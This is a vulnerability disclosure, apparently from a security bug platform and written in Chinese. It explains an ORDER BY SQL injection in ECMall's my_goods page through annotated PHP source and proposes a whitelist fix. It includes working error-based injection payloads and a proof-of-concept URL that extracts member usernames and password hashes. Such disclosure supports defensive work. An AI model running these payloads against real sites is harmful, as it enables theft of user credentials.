### 简要描述: 本来想早点分析完然后奋斗ECSHOP...结果一直不给老衲机会啊,越来越不敢相信是不是官方版本了,是不是下错了.酒喝多了头有点晕.不知道有没有把分析写错... ### 详细说明: order by 参数注入,后面不能跟union,但是可以用双重查询. select...from...order by 1 and (select user_name from ecm_member where user_id=1) 或者 select...from...order by 1,(select user_name from ecm_member where user_id=1) 但是在第2个select里面可以用union select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b) 或 select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b) app/my_goods.app.php ``` function index() { /* 取得店铺商品分类 */ $this->assign('sgcategories', $this->_get_sgcategory_options()); $conditions = $this->_get_conditions(); $page = $this->_get_page(); $page_nolimit = array(); $goods_list = $this->_get_goods($conditions, $page); //跟进 $all_goods = $this->_get_goods($conditions, $page_nolimit); ...... 
}
/**
 * Builds the goods-list query for the shop's "my goods" page from request parameters.
 * $page is passed by reference; only $page['limit'] is read here.
 * Security: $_GET['sort'] is read and, after trim()/strtolower(), used verbatim as the
 * ORDER BY column expression. There is no whitelist of sortable columns, so this is the
 * entry point of the ORDER BY SQL injection described above.
 */
function _get_goods($conditions, &$page)
{
    if (intval($_GET['sgcate_id']) > 0) {
        // the category id is cast with intval(), so this parameter is not injectable
        $cate_mod =& bm('gcategory', array('_store_id' => $this->_store_id));
        $cate_ids = $cate_mod->get_descendant_ids(intval($_GET['sgcate_id']));
    } else {
        $cate_ids = 0;
    }
    // flag whether any filter condition is active
    if ($conditions != '1 = 1' || !empty($_GET['sgcate_id'])) {
        $this->assign('filtered', 1);
    }
    // update sorting
    if (isset($_GET['sort']) && isset($_GET['order'])) {
        $sort = strtolower(trim($_GET['sort'])); // NOT FILTERED: trim()/strtolower() are not validation, any SQL expression survives
        $order = strtolower(trim($_GET['order']));
        if (!in_array($order,array('asc','desc'))) // only $order is restricted to asc/desc; $sort is never checked
        {
            $sort = 'goods_id';
            $order = 'desc';
        }
    } else {
        $sort = 'goods_id';
        $order = 'desc';
    }
    if ($page) {
        $limit = $page['limit'];
        $count = true;
    } else {
        $limit = '';
        $count = false;
    }
    /* fetch the goods list */
    $goods_list = $this->_goods_mod->get_list(array(
        'conditions' => $conditions,
        'count' => $count,
        // SELECT ... FROM ... ORDER BY injection: the attacker-controlled $sort is
        // concatenated straight into the ORDER BY fragment. Mitigation: accept $sort
        // only if it is in a fixed list of sortable column names (e.g. goods_id) and
        // otherwise fall back to the default, exactly as is already done for $order.
        'order' => "$sort $order",
        'limit' => $limit,
    ), $cate_ids);
    return $goods_list;
}
```
includes/models/goods.model.php
```
/**
 * Returns the goods list for the given params (excerpt; elided parts are shown as "......").
 * The ORDER BY fragment received in $params['order'] is not validated anywhere in this
 * method before it reaches the database.
 */
function get_list($params = array(), $scate_ids = array(), $desc = false, $no_picture = true)
{
    is_int($scate_ids) && $scate_ids > 0 && $scate_ids = array($scate_ids);
    // extract() turns the keys of the params array into local variables holding the
    // array values: the caller's 'conditions', 'count', 'order' and 'limit' keys become
    // $conditions, $count, $order ("$sort $order" from _get_goods) and $limit.
    // $fields, $tables and $index_key are presumably set by _initFindParams() defaults
    // or in the elided part — not visible here.
    extract($this->_initFindParams($params));
    ......
    /* conditions (WHERE) */
    $conditions = $this->_getConditions($conditions, true);
    $conditions .= " AND gs.spec_id IS NOT NULL AND s.store_id IS NOT NULL ";
    if ($scate_ids) {
        ......
    }
    /* sorting (ORDER BY) */
    if ($order) {
        // getRealFields() only rewrites "alias.field" references to real table names;
        // it does not validate $order (follow into eccore/model/model.base.php)
        $order = ' ORDER BY ' . $this->getRealFields($order) . ', s.sort_order ';
    }
    /* paging (LIMIT) */
    $limit && $limit = ' LIMIT ' . $limit;
    if ($count) {
        // the COUNT query carries no ORDER BY, so only the main query below is affected
        $this->_updateLastQueryCount("SELECT COUNT(*) as c FROM {$tables}{$conditions}");
    }
    /* the complete SQL */
    $this->temp = $tables . $conditions;
    $sql = "SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}";
    // the tainted ORDER BY fragment is interpolated into $sql and executed here
    $goods_list = $index_key ? $this->db->getAllWithIndex($sql, $index_key) : $this->db->getAll($sql);
    ......
}
```
eccore/model/model.base.php
```
/**
 * Rewrites "alias.field" references in a field list to "<real table>.field" via
 * _getFieldTable(); apart from that rewrite the input string is returned as given.
 * This is a field-name mapper, not a sanitizer: an ORDER BY expression assembled from
 * user input passes through here intact, which is why the injection above reaches the
 * database.
 */
function getRealFields($src_fields_list)
{
    $fields = $src_fields_list;
    if (!$src_fields_list) {
        $fields = '';
    }
    // The /e modifier evaluates the replacement string as PHP code with the captured
    // groups substituted in. Both capture groups admit only [a-zA-Z0-9_] / [a-zA-Z0-9_*],
    // so no quote or operator can reach that eval — the regex neither blocks nor
    // extends the injection (the author's "no effect" note). /e is nonetheless
    // deprecated since PHP 5.5 and removed in PHP 7; preg_replace_callback() is the
    // supported replacement.
    $fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', "\$this->_getFieldTable('\\1') . '.\\2'", $fields);
    return $fields;
}
```
http://localhost/ecmall/index.php?app=my_goods&act=index&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201309/260122499d31e628defba615112596407f3963b0.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/260122499d31e628defba615112596407f3963b0.jpg)